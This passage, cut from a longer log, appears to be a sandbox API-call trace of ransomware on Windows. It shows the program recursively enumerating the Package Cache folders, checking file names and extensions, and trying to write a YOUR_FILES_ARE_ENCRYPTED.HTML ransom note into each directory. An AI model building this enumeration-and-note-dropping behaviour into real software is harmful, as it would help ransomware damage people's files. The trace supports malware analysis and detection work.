dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.161] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.173] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.173] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.174] GetProcessHeap () returned 0x270000 [0170.175] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.175] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0170.175] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 75 [0170.175] GetProcessHeap () returned 0x270000 [0170.175] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.175] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0170.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0170.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.175] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.175] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359dcc70, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3d0955b0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0170.175] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 85 [0170.175] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.175] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.176] lstrlenW (lpString=".rsm") returned 4 [0170.176] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, 
nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 93 [0170.176] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.176] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0170.176] lstrlenW (lpString=".exe") returned 4 [0170.176] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8a38a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.176] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8a38a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.176] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.176] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.176] GetProcessHeap () returned 0x270000 [0170.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.178] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0170.178] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 86 [0170.178] GetProcessHeap () returned 0x270000 [0170.178] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.178] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All 
Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0170.178] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" [0170.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.178] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.178] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, 
ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.178] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 95 [0170.179] GetProcessHeap () returned 0x270000 [0170.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.179] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0170.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0170.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.179] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.179] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.179] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 119 [0170.179] GetProcessHeap () returned 0x270000 [0170.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.179] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0170.179] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0170.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.179] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc8efb60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8efb60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xccca7dc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, 
nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958", cAlternateFileName="CAB1CA~1.AD7")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned 193 [0170.180] lstrcmpW (lpString1="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.180] PathFindExtensionW (pszPath="cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" [0170.180] lstrlenW (lpString=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned 65 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0170.180] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.180] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") 
returned=".msi" [0170.180] lstrlenW (lpString=".msi") returned 4 [0170.180] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8c9a00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8c9a00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.180] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8c9a00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8c9a00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.180] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.180] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 
[0170.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.180] GetProcessHeap () returned 0x270000 [0170.181] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.181] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.182] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.182] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, 
